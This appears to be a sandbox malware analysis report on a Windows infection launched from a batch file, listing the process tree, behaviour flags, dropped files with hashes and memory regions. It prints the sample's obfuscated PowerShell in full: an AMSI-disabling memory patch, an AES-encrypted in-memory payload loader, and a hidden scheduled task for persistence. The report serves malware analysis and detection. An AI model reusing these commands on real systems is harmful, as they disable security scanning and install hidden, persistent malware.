IntPtr).GetType(),[string]),$Null);$JhUSuyUUnjupDQaWKDN=UrpccseDxPsG @([String])([IntPtr]);$oWHmiumCDkrFaLVDxBOzaj=UrpccseDxPsG @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$uLmyNPzugee=$DODpLOnFksKcP.GetMethod(''+[Char](71)+'et'+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+''+'H'+''+[Char](97)+''+'n'+''+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+'n'+[Char](101)+''+[Char](108)+'3'+[Char](50)+''+[Char](46)+''+'d'+''+[Char](108)+'l')));$sEmfXrCZfAstme=$oDjiOhHAGHWQNV.Invoke($Null,@([Object]$uLmyNPzugee,[Object](''+[Char](76)+'o'+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+'b'+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$GdRENnwGcYvkloHLd=$oDjiOhHAGHWQNV.Invoke($Null,@([Object]$uLmyNPzugee,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+''+'P'+''+[Char](114)+''+[Char](111)+''+'t'+''+[Char](101)+''+'c'+''+'t'+'')));$vPgmhha=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($sEmfXrCZfAstme,$JhUSuyUUnjupDQaWKDN).Invoke(''+'a'+'m'+[Char](115)+'i'+'.'+''+'d'+'l'+[Char](108)+'');$uVQmZSjSGubsATebz=$oDjiOhHAGHWQNV.Invoke($Null,@([Object]$vPgmhha,[Object](''+[Char](65)+'m'+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+'a'+'n'+''+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+'e'+[Char](114)+'')));$XsJDotkpKL=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GdRENnwGcYvkloHLd,$oWHmiumCDkrFaLVDxBOzaj).Invoke($uVQmZSjSGubsATebz,[uint32]8,4,[ref]$XsJDotkpKL);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$uVQmZSjSGubsATebz,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GdRENnwGcYvkloHLd,$oWHmiumCDkrFaLVDxBOzaj).Invoke($uVQmZSjSGubsATebz,[uint32]8,0x20,[ref]$XsJDotkpKL);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'F'+'T'+'W'+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue('$'+[Char](55)+''+[Char](55)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ZQNyOTmGcucG{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$TJjJTDZYERDFZl,[Parameter(Position=1)][Type]$VtglJpHUzI)$aaFRHMhVWBt=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+'f'+'lec'+[Char](116)+'e'+[Char](100)+''+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+'g'+''+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+'e'+'m'+''+[Char](111)+''+'r'+''+[Char](121)+''+'M'+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+'e'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+'T'+''+[Char](121)+'p'+'e'+'',''+'C'+''+'l'+''+'a'+''+[Char](115)+'s,'+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+',Se'+'a'+''+[Char](108)+'e'+[Char](100)+''+','+''+'A'+''+[Char](110)+'s'+'i'+'C'+'l'+'as'+[Char](115)+''+[Char](44)+''+[Char](65)+'ut'+[Char](111)+''+'C'+'l'+'a'+'s'+'s'+'',[MulticastDelegate]);$aaFRHMhVWBt.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+''+'e'+','+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'ByS'+'i'+'g'+[Char](44)+'P'+'u'+'bl'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$TJjJTDZYERDFZl).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+'g'+''+[Char](101)+''+[Char](100)+'');$aaFRHMhVWBt.DefineMethod('I'+[Char](110)+''+[Char](118)+''+[Char](111)+'k'+'e'+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c'+[Char](44)+'H'+[Char](105)+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+','+'V'+'i'+''+[Char](114)+''+'t'+''+'u'+'a'+[Char](108)+'',$VtglJpHUzI,$TJjJTDZYERDFZl).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+'n'+[Char](97)+''+'g'+'e'+'d'+'');Write-Output $aaFRHMhVWBt.CreateType();}$iFZsQzxEdxkoM=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+''+[Char](116)+'e'+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType('M'+[Char](105)+''+[Char](99)+''+'r'+''+'o'+''+[Char](115)+''+'o'+'ft'+'.'+'W'+[Char](105)+''+[Char](110)+'32'+[Char](46)+''+[Char](85)+''+'n'+''+'s'+''+'a'+''+'f'+'e'+[Char](78)+'a'+[Char](116)+''+'i'+'v'+'e'+''+'M'+''+'e'+''+[Char](116)+'hod'+[Char](115)+'');$QBepLGYtUXKJzT=$iFZsQzxEdxkoM.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](80)+''+'r'+''+[Char](111)+'c'+[Char](65)+'dd'+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+'S'+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$SSelmtnaFRHeZEJJvyM=ZQNyOTmGcucG @([String])([IntPtr]);$lmgyrAElOuQwxjNwPXfHFK=ZQNyOTmGcucG @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$zNSnNzlgkvI=$iFZsQzxEdxkoM.GetMethod(''+'G'+'e'+[Char](116)+''+[Char](77)+'o'+[Char](100)+''+'u'+'le'+[Char](72)+'a'+[Char](110)+''+'d'+''+[Char](108)+'e').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+'r'+''+'n'+'e'+[Char](108)+''+'3'+''+'2'+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$ITHIEGuyaDtqci=$QBepLGYtUXKJzT.Invoke($Null,@([Object]$zNSnNzlgkvI,[Object](''+'L'+''+[Char](111)+''+'a'+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+'a'+'r'+[Char](121)+'A')));$aFdLaLBiJqefOgWLC=$QBepLGYtUXKJzT.Invoke($Null,@([Object]$zNSnNzlgkvI,[Object](''+[Char](86)+''+[Char](105)+'rt'+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+'o'+[Char](116)+'e'+[Char](99)+''+[Char](116)+'')));$CsaRoKd=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ITHIEGuyaDtqci,$SSelmtnaFRHeZEJJvyM).Invoke(''+'a'+''+[Char](109)+''+'s'+''+[Char](105)+''+'.'+''+'d'+'l'+[Char](108)+'');$HLQXhdPSUgXTqqktb=$QBepLGYtUXKJzT.Invoke($Null,@([Object]$CsaRoKd,[Object]('A'+[Char](109)+'s'+[Char](105)+''+[Char](83)+''+'c'+''+[Char](97)+''+'n'+'B'+[Char](117)+''+'f'+''+[Char](102)+''+[Char](101)+'r')));$ttWCnngniC=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($aFdLaLBiJqefOgWLC,$lmgyrAElOuQwxjNwPXfHFK).Invoke($HLQXhdPSUgXTqqktb,[uint32]8,4,[ref]$ttWCnngniC);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$HLQXhdPSUgXTqqktb,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($aFdLaLBiJqefOgWLC,$lmgyrAElOuQwxjNwPXfHFK).Invoke($HLQXhdPSUgXTqqktb,[uint32]8,0x20,[ref]$ttWCnngniC);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+[Char](70)+'T'+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+'7'+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\sihost.exesihost.exe2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵
- Drops file in System32 directory
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s TokenBroker1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('V4Hy8emI3mM56PZmDPionZmQDoSVLTkUh0buDVVDWdM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S+QbBB6/ak2YmQDkQn0LyA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $uBtlQ=New-Object System.IO.MemoryStream(,$param_var); $FyNRj=New-Object System.IO.MemoryStream; $GWKHD=New-Object System.IO.Compression.GZipStream($uBtlQ, [IO.Compression.CompressionMode]::Decompress); $GWKHD.CopyTo($FyNRj); $GWKHD.Dispose(); $uBtlQ.Dispose(); $FyNRj.Dispose(); $FyNRj.ToArray();}function execute_function($param_var,$param2_var){ $pANIv=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $mSXDz=$pANIv.EntryPoint; $mSXDz.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$eOdAN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($lhvkI in $eOdAN) { if ($lhvkI.StartsWith(':: ')) { $JmDDg=$lhvkI.Substring(3); break; }}$payloads_var=[string[]]$JmDDg.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_392_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_392.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_392.vbs"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_392.bat" "5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('V4Hy8emI3mM56PZmDPionZmQDoSVLTkUh0buDVVDWdM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S+QbBB6/ak2YmQDkQn0LyA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $uBtlQ=New-Object System.IO.MemoryStream(,$param_var); $FyNRj=New-Object System.IO.MemoryStream; $GWKHD=New-Object System.IO.Compression.GZipStream($uBtlQ, [IO.Compression.CompressionMode]::Decompress); $GWKHD.CopyTo($FyNRj); $GWKHD.Dispose(); $uBtlQ.Dispose(); $FyNRj.Dispose(); $FyNRj.ToArray();}function execute_function($param_var,$param2_var){ $pANIv=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $mSXDz=$pANIv.EntryPoint; $mSXDz.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_392.bat';$eOdAN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_392.bat').Split([Environment]::NewLine);foreach ($lhvkI in $eOdAN) { if ($lhvkI.StartsWith(':: ')) { $JmDDg=$lhvkI.Substring(3); break; }}$payloads_var=[string[]]$JmDDg.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GGJD5csip1tk.bat" "7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Windows\SysWOW64\chcp.comchcp 650018⤵
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost8⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wlidsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\ApplicationFrameHost.exeC:\Windows\system32\ApplicationFrameHost.exe -Embedding1⤵
-
C:\Windows\System32\InstallAgent.exeC:\Windows\System32\InstallAgent.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe1⤵
-
C:\Windows\sysWOW64\wbem\wmiprvse.exeC:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD5ac3d19fbb5c5f10833f1882308f77548
SHA1ac880466fd99a5719fedc7289b00d78ba7088e06
SHA2563353b90af649198e084632af776f8c6ea3a9302da5a50d85f7ecde1c7ad295df
SHA512b5e6369d7f475e9931d19fb2a5305b4c901ca5fcac5d788d064b6a1b1d6de2034e84932ac243d5056c745b924a2e9537a06b4172fab364402263788c814bc28b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
17KB
MD5602697434d1fbc5948155cd4b07cef92
SHA1b830614c93452a2a3aeef20a51ec7775bb898b5e
SHA256b34b9a6d135915c198765c443feb086d073832e672ce4453f2f04788a9403aab
SHA512a2e895eaea85cd5302eeb59143dcfa65630f7321d91bbe0f1559249f10b772fa0d4ea5aa79616a06c64ee486fca22759286e86dafff72acf7a11bc515a49ecec
-
C:\Users\Admin\AppData\Local\Temp\GGJD5csip1tk.batFilesize
276B
MD541cb236d5025fe4aa30916db372b7eab
SHA1fede30b6d6aff06b5d56c762b64d68e7196dc465
SHA256c56c84ebe8652c8b66de4b8fea77b81aca7d74a40d3011ccd877f75cc2a8be52
SHA512b8de4588b76bce88c04c2bbf4939c968a7dd737ff4d3cef2af246babbe0b45124d135842c52a189750c576ac88b502bf741088e076f4455c06055467e04b572e
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1xpgydi4.lbp.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
C:\Users\Admin\AppData\Local\Temp\install.exeFilesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
C:\Users\Admin\AppData\Roaming\$SXR-LOGS\05-14-~1Filesize
224B
MD5a84397af7dc1ce2cee71c76d03b1bcd7
SHA1e545cc3ec6e4de56028bfddcf1929364d403048e
SHA25602f75c4e6aa15bbb6329a9f44baf2a6804f514941bc98a2af2464d704144afbf
SHA512095db46a47071b24ce4a79d53d9440344d86435b17bb584c58419f1207827a1f263ee334009b43bfa57353906df2fcad750126fef67101b6980656a9a8366716
-
C:\Users\Admin\AppData\Roaming\startup_str_392.batFilesize
513KB
MD5a84be587721ab2558489178539f283e6
SHA15a48f5c98f7366d13f371965c19c98a5754bd90b
SHA25632cfb4e83f43787c79ef6a15bef53137a0e9a6d6d558ef1532993fb8369cc8fd
SHA512c1c4e35246c39f3e710cbd261187c7968d75c65fd1c4b96f6caa6ddec1484ca42f2431f4184ec0061cd7b2e0d3478db993f88a043106f0ce9d7ae859c3f5f931
-
C:\Users\Admin\AppData\Roaming\startup_str_392.vbsFilesize
115B
MD553d92eb6350fdb3e9ec2c3fb1752723b
SHA1c26216a618184875ef9c3da5523d217002d064cf
SHA256b92104fd3958f17653ab3e8923807fae4920eecc046abdb90663989122debf75
SHA5121f78e4504a941f93df78ff8891bdaf60256783a19eeddff5b91f06a3773252a24f8aa9b446bba974fc8efa4ef9528ffe5ea81ccf7b3aaaa9fd691d42b28ac445
-
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187Filesize
412B
MD5d8a99f426be6a1c0f9a8c574d87acd08
SHA1258650a28621fd86ac87f046c478eda527f5c4bc
SHA256bfbcdd06b348856a4ffeddd879e0b1b17415e2b1ce7a701e378ba4708e2a1a17
SHA5127571968ca45dcf4181dbd9c9d1b5849f29ccc48ad6b065dbd072c4b93ffa019da3874782531c107a9563c051743bdf81d592ff00a50f9dba49575e61aad9df09
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.logFilesize
3KB
MD556efdb5a0f10b5eece165de4f8c9d799
SHA1fa5de7ca343b018c3bfeab692545eb544c244e16
SHA2566c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108
SHA51291e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5d61d7f65117823a52913b840feed43c6
SHA1e2580207e1611dcb229ee9d2b4bb0bd4dbcc884f
SHA256d0d50cb4ab1fe4b5dcb9c081d49b33381336fc0ebc7629702ed94d47f7032a86
SHA512e4cf12f3642ce8746f39bcfaa6265d105919d1cbe863119f4413aa4c5d307d7d69f0638bd0434d47f651e183ec209f02dd7d44954c790ef4d585155817ed8a3c
-
memory/316-64-0x0000000070240000-0x000000007028B000-memory.dmpFilesize
300KB
-
memory/316-65-0x00000000096D0000-0x00000000096EE000-memory.dmpFilesize
120KB
-
memory/316-72-0x0000000009C10000-0x0000000009CA4000-memory.dmpFilesize
592KB
-
memory/316-73-0x0000000073660000-0x0000000073D4E000-memory.dmpFilesize
6.9MB
-
memory/316-63-0x0000000009710000-0x0000000009743000-memory.dmpFilesize
204KB
-
memory/316-66-0x0000000073660000-0x0000000073D4E000-memory.dmpFilesize
6.9MB
-
memory/316-166-0x0000000073660000-0x0000000073D4E000-memory.dmpFilesize
6.9MB
-
memory/316-44-0x0000000073660000-0x0000000073D4E000-memory.dmpFilesize
6.9MB
-
memory/316-45-0x0000000073660000-0x0000000073D4E000-memory.dmpFilesize
6.9MB
-
memory/316-46-0x0000000073660000-0x0000000073D4E000-memory.dmpFilesize
6.9MB
-
memory/316-158-0x0000000073660000-0x0000000073D4E000-memory.dmpFilesize
6.9MB
-
memory/316-71-0x0000000009970000-0x0000000009A15000-memory.dmpFilesize
660KB
-
memory/584-256-0x0000022D64A80000-0x0000022D64AA5000-memory.dmpFilesize
148KB
-
memory/584-257-0x0000022D64AB0000-0x0000022D64ADB000-memory.dmpFilesize
172KB
-
memory/584-258-0x0000022D64AB0000-0x0000022D64ADB000-memory.dmpFilesize
172KB
-
memory/584-264-0x0000022D64AB0000-0x0000022D64ADB000-memory.dmpFilesize
172KB
-
memory/584-265-0x00007FFF884F0000-0x00007FFF88500000-memory.dmpFilesize
64KB
-
